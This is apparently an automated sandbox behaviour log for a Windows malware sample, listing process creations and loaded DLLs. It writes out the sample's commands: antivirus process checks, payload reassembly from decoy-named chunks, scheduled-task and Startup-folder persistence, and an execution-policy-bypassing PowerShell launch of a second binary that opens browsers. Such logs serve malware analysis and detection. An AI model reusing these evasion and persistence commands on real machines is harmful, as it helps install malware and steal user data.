Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pubJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.comJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub mJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com mJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /FJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /FJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2184,i,15394741629772577023,2250770724390570129,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2204 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,7206107532581912577,15538010115052324354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\expand.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: version.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: gpapi.dll
